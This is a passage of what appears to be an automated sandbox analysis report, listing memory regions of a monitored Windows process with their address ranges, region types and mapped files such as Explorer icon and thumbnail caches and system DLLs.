"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 525 start_va = 0x5e0000 end_va = 0x5f6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 526 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 527 start_va = 0x610000 end_va = 0x628fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 528 start_va = 0x630000 end_va = 0x631fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 529 start_va = 0x640000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 530 start_va = 0x650000 end_va = 0x67dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 531 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 532 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 533 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 534 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 535 start_va = 0x1db0000 end_va = 0x21aafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001db0000" filename = "" Region: id = 536 start_va = 0x21b0000 end_va = 0x21b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 537 start_va = 0x21c0000 end_va = 0x21c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021c0000" filename = "" Region: id = 538 start_va = 0x21d0000 end_va = 0x21d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 539 start_va = 0x21e0000 end_va = 0x21e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 540 start_va = 0x21f0000 end_va = 0x21f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 541 start_va = 0x2200000 end_va = 0x2201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 542 start_va = 0x2210000 end_va = 0x2210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 543 start_va = 0x2220000 end_va = 0x2220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 544 start_va = 0x2230000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 545 start_va = 0x22b0000 end_va = 0x22b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 546 start_va = 0x22c0000 end_va = 0x22c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022c0000" filename = "" Region: id = 547 start_va = 0x22d0000 end_va = 0x22d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 548 start_va = 0x22e0000 end_va = 0x22e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 549 start_va = 0x22f0000 end_va = 0x22f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 550 start_va = 0x2300000 end_va = 0x2301fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 551 start_va = 0x2310000 end_va = 0x2310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 552 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 553 start_va = 0x2330000 end_va = 0x2666fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 554 start_va = 0x2670000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 555 start_va = 0x26f0000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 556 start_va = 0x2770000 end_va = 0x2771fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 557 start_va = 0x2780000 end_va = 0x2781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 558 start_va = 0x2790000 end_va = 0x2791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002790000" filename = "" Region: id = 559 start_va = 0x27a0000 end_va = 0x27a1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 560 start_va = 0x27d0000 end_va = 0x27d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 561 start_va = 0x27f0000 end_va = 0x28cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 562 start_va = 0x28d0000 end_va = 0x28d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 563 start_va = 0x28e0000 end_va = 0x28e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 564 start_va = 0x28f0000 end_va = 0x28f1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 565 start_va = 0x2900000 end_va = 0x2900fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 566 start_va = 0x2910000 end_va = 0x2910fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_256.db") Region: id = 567 start_va = 0x2920000 end_va = 0x2927fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 568 start_va = 0x2940000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002940000" filename = "" Region: id = 569 start_va = 0x2950000 end_va = 0x2951fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 570 start_va = 0x2960000 end_va = 0x2961fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 571 start_va = 0x2970000 end_va = 0x2973fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 572 start_va = 0x2980000 end_va = 0x2997fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 573 start_va = 0x29a0000 end_va = 0x29a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029a0000" filename = "" Region: id = 574 start_va = 0x29b0000 end_va = 0x29b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029b0000" filename = "" Region: id = 575 start_va = 0x29c0000 end_va = 0x29c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 576 start_va = 0x29d0000 end_va = 0x2a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 577 start_va = 0x2a50000 end_va = 0x2b0bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 578 start_va = 0x2b10000 end_va = 0x2c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 579 start_va = 0x2c10000 end_va = 0x3c4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 580 start_va = 0x3c50000 end_va = 0x3ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 581 start_va = 0x3cd0000 end_va = 0x3dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 582 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 583 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 584 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 585 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 586 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 587 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 588 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 589 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 590 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 591 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 592 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 593 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 594 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 595 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 596 start_va = 0x3ee0000 end_va = 0x3ee1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 597 start_va = 0x3ef0000 end_va = 0x3f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 598 start_va = 0x3f40000 end_va = 0x3f44fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 599 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 600 start_va = 0x3f60000 end_va = 0x3f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 601 start_va = 0x3f70000 end_va = 0x3fb4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 602 start_va = 0x3fc0000 end_va = 0x3fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 603 start_va = 0x3fd0000 end_va = 0x405dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 604 start_va = 0x4060000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 605 start_va = 0x40e0000 end_va = 0x40e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 606 start_va = 0x40f0000 end_va = 0x40f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 607 start_va = 0x4100000 end_va = 0x4101fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 608 start_va = 0x4110000 end_va = 0x4111fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 609 start_va = 0x4120000 end_va = 0x4120fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 610 start_va = 0x4130000 end_va = 0x4130fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 611 start_va = 0x4140000 end_va = 0x4141fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 612 start_va = 0x4150000 end_va = 0x4150fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 613 start_va = 0x4160000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 614 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 615 start_va = 0x41f0000 end_va = 0x4238fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 616 start_va = 0x4240000 end_va = 0x4241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004240000" filename = "" Region: id = 617 start_va = 0x4250000 end_va = 0x4250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 618 start_va = 0x4260000 end_va = 0x4260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 619 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 620 start_va = 0x42f0000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 621 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 622 start_va = 0x43f0000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 623 start_va = 0x4470000 end_va = 0x4c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 624 start_va = 0x4c70000 end_va = 0x4ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c70000" filename = "" Region: id = 625 start_va = 0x4cf0000 end_va = 0x4deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 626 start_va = 0x4df0000 end_va = 0x7171fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 627 start_va = 0x7180000 end_va = 0x7671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007180000" filename = "" Region: id = 628 start_va = 0x7680000 end_va = 0x787ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007680000" filename = "" Region: id = 629 start_va = 0x7880000 end_va = 0x7884fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 630 start_va = 0x7890000 end_va = 0x789ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 631 start_va = 0x78a0000 end_va = 0x78a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 632 start_va = 0x78b0000 end_va = 0x78b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078b0000" filename = "" Region: id = 633 start_va = 0x78c0000 end_va = 0x78c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000078c0000" filename = "" Region: id = 634 start_va = 0x78d0000 end_va = 0x78d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078d0000" filename = "" Region: id = 635 start_va = 0x78e0000 end_va = 0x78e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078e0000" filename = "" Region: id = 636 start_va = 0x78f0000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078f0000" filename = "" Region: id = 637 start_va = 0x7900000 end_va = 0x79fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 638 start_va = 0x7a00000 end_va = 0x7a0dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 639 start_va = 0x7a10000 end_va = 0x7a13fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 640 start_va = 0x7a20000 end_va = 0x7b3cfff monitored = 0 entry_point = 0x7a21cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 641 start_va = 0x7ba0000 end_va = 0x7ba1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007ba0000" filename = "" Region: id = 642 start_va = 0x7bb0000 end_va = 0x7bb1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 643 start_va = 0x7bc0000 end_va = 0x7bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007bc0000" filename = "" Region: id = 644 start_va = 0x7bd0000 end_va = 0x7bd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007bd0000" filename = "" Region: id = 645 start_va = 0x7be0000 end_va = 0x7be1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007be0000" filename = "" Region: id = 646 start_va = 0x7bf0000 end_va = 0x7bf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 647 start_va = 0x7c00000 end_va = 0x7c08fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 648 start_va = 0x7c20000 end_va = 0x7c23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 649 start_va = 0x7c30000 end_va = 0x7c30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 650 start_va = 0x7c40000 end_va = 0x7c48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c40000" filename = "" Region: id = 651 start_va = 0x7c50000 end_va = 0x7c50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c50000" filename = "" Region: id = 652 start_va = 0x7c60000 end_va = 0x7d5dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c60000" filename = "" Region: id = 653 start_va = 0x7d60000 end_va = 0x7d61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d60000" filename = "" Region: id = 654 start_va = 0x7d70000 end_va = 0x7db7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d70000" filename = "" Region: id = 655 start_va = 0x7dc0000 end_va = 0x7dc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007dc0000" filename = "" Region: id = 656 start_va = 0x7dd0000 end_va = 0x7dd3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 657 start_va = 0x7de0000 end_va = 0x7de0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 658 start_va = 0x7df0000 end_va = 0x7df3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name 